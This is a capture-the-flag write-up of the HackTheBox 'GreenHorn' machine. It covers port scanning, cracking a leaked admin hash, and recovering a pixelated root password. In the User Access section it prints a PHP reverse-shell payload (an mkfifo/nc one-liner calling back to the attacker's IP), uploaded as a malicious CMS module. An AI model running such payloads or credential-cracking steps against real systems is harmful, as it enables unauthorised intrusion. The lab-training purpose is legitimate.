Summary

This is a technical write-up for the GreenHorn Linux machine on HackTheBox. Access to the user account was obtained by cracking the exposed admin password hash of the CMD administrator, allowing the upload of a malicious module to the web application. Root access was achieved by de-anonymizing a password screenshot stored in the user folder.

Reconnaissance

Basic Scans

First, nmap scans were performed for the full TCP port range and the top 200 UDP ports:

nmap -v -T4 -Pn -A -oA nmap_full_tcp -p 1-65535 10.10.11.25
nmap -v -T4 -Pn -sU --top-ports 200 10.10.11.25

The output revealed three TCP services listening on the target host:

Nmap scan report for greenhorn.htb (10.10.11.25)
Host is up (0.048s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    nginx 1.18.0 (Ubuntu)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-generator: pluck 4.7.18
| http-methods: 
|_  Supported Methods: GET HEAD POST
| http-robots.txt: 2 disallowed entries 
|_/data/ /docs/
|_http-server-header: nginx/1.18.0 (Ubuntu)
| http-title: Welcome to GreenHorn ! - GreenHorn
|_Requested resource was http://greenhorn.htb/?file=welcome-to-greenhorn
|_http-trane-info: Problem with XML parsing of /evox/about
|_https-redirect: ERROR: Script execution failed (use -d to debug)
3000/tcp open  ppp?
| fingerprint-strings: 
|   GenericLines, Help, RTSPRequest: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Cache-Control: max-age=0, private, must-revalidate, no-transform
|     Content-Type: text/html; charset=utf-8
|     Set-Cookie: i_like_gitea=2d720d12bb47d9bd; Path=/; HttpOnly; SameSite=Lax
|     Set-Cookie: _csrf=YI0TZ56Fqhg8gWXt5Fov7fu7RJU6MTcyMjA3NTAxNjUwMjk3OTkzOQ; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
|     X-Frame-Options: SAMEORIGIN
|     Date: Sat, 27 Jul 2024 10:10:16 GMT
|     <!DOCTYPE html>
|     <html lang="en-US" class="theme-auto">
|     <head>
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <title>GreenHorn</title>
|     <link rel="manifest" href="data:application/json;base64,eyJuYW1lIjoiR3JlZW5Ib3JuIiwic2hvcnRfbmFtZSI6IkdyZWVuSG9ybiIsInN0YXJ0X3VybCI6Imh0dHA6Ly9ncmVlbmhvcm4uaHRiOjMwMDAvIiwiaWNvbnMiOlt7InNyYyI6Imh0dHA6Ly9ncmVlbmhvcm4uaHRiOjMwMDAvYXNzZXRzL2ltZy9sb2dvLnBuZyIsInR5cGUiOiJpbWFnZS9wbmciLCJzaXplcyI6IjUxMng1MTIifSx7InNyYyI6Imh0dHA6Ly9ncmVlbmhvcm4uaHRiOjMwMDAvYX
|   HTTPOptions: 
|     HTTP/1.0 405 Method Not Allowed
|     Allow: HEAD
|     Allow: GET
|     Cache-Control: max-age=0, private, must-revalidate, no-transform
|     Set-Cookie: i_like_gitea=778d563740427839; Path=/; HttpOnly; SameSite=Lax
|     Set-Cookie: _csrf=1-58iSr-RhBQcPFbzZmPumPjbow6MTcyMjA3NTAyMTc5MzE2ODI3OA; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
|     X-Frame-Options: SAMEORIGIN
|     Date: Sat, 27 Jul 2024 10:10:21 GMT
|_    Content-Length: 0

Service Identification

22/tcp

Port 22/tcp was obviously an OpenSSH service that may enable the attacker to access the machine after obtaining sufficient credentials from the server or adding to the user’s authorized_keys file. At this point, nothing could be done with this service.

80/tcp

Port 80/tcp was an instance of pluck CMS of an unknown version. The CMS has a known exploit but it requires an admin password to be used.

3000/tcp

Port 3000/tcp is a Gitea instance with open access to the GreenAdmin project with the GreenHorn repository, which is the codebase of the pluck CMS.

Foothold

The source code from Gitea revealed the mechanism for authentication, which is a hardcoded password from the http://greenhorn.htb:3000/GreenAdmin/GreenHorn/src/branch/main/data/settings/pass.php file:

<?php
$ww = 'd5443aef1b64544f3685bf112f6c405218c573c7279a831b1fe9612e3a4d770486743c5580556c0d838b51749de15530f87fb793afdcc689b6b39024d7790163';
?>

Saved it to admin_pass.hash and used hashid to identify that this is most probably SHA-512:

hashid admin_pass.hash

--File 'admin_pass.hash'--
Analyzing 'd5443aef1b64544f3685bf112f6c405218c573c7279a831b1fe9612e3a4d770486743c5580556c0d838b51749de15530f87fb793afdcc689b6b39024d7790163'
[+] SHA-512
[+] Whirlpool
[+] Salsa10
[+] Salsa20
[+] SHA3-512
[+] Skein-512
[+] Skein-1024(512)
--End of file 'admin_pass.hash'--

Now it was cracked with hashcat and we got the admin password: iloveyou1

hashcat -a 0 -m 1700 admin_pass.hash ~/HTB/wordlists/rockyou.txt

d5443aef1b64544f3685bf112f6c405218c573c7279a831b1fe9612e3a4d770486743c5580556c0d838b51749de15530f87fb793afdcc689b6b39024d7790163:iloveyou1

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 1700 (SHA2-512)
Hash.Target......: d5443aef1b64544f3685bf112f6c405218c573c7279a831b1fe...790163
Time.Started.....: Sat Jul 27 12:26:26 2024 (0 secs)
Time.Estimated...: Sat Jul 27 12:26:26 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/home/m4rt/HTB/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  4328.0 kH/s (0.39ms) @ Accel:1024 Loops:1 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests
Progress.........: 6144/14344385 (0.04%)
Rejected.........: 0/6144 (0.00%)
Restore.Point....: 0/14344385 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: 123456 -> iheartyou
Hardware.Mon.#1..: Temp: 66c Util: 21%

User Access

Now that we have the admin password for pluck CMS, we can use it to log in at http://greenhorn.htb/login.php.

In order to use known exploit for pluck CMS we can create a malicious PHP file:

<?php

exec("rm /tmp/fafa;mkfifo /tmp/fafa;cat /tmp/fafa|/bin/sh -i 2>&1|nc 10.10.14.8 1234 >/tmp/fafa");

?>

and ZIP it before uploading:

┌──(kali㉿kali)-[~/HTB/10.10.11.25]
└─$ zip -r revshell.zip revshell.php

Now the ZIP file can be uploaded in Options / Manage Modules / Install a module, but before that, it’s needed to set up a reverse shell listener:

┌──(kali㉿kali)-[~/HTB/10.10.11.25]
└─$ nc -nlvp 1234

Once a reverse shell is established, we have an unprivileged shell as www-data. We can see two users in the /home directory: git and junior. The same cracked password iloveyou1 will allow logging in as the junior user with the following command:

su junior

Privilege Escalation

The home directory of user junior contains a PDF file called Using OpenVAS.pdf. After downloading the file, we can see it has an anonymized password inside. Once we extract the image file from the PDF, we can try to de-anonymize it with the Depix tool and use sidefromsidetheothersidesidefromsidetheotherside as the root password.

┌──(kali㉿kali)-[~/HTB/10.10.11.25]
└─$ python3 depix.py -p ../password_pix.png -s images/searchimages/debruinseq_notepad_Windows10_closeAndSpaced.png -o ../password_depix.png

Summary#

Reconnaissance#

Basic Scans#

Service Identification#

22/tcp#

80/tcp#

3000/tcp#

Foothold#

User Access#

Privilege Escalation#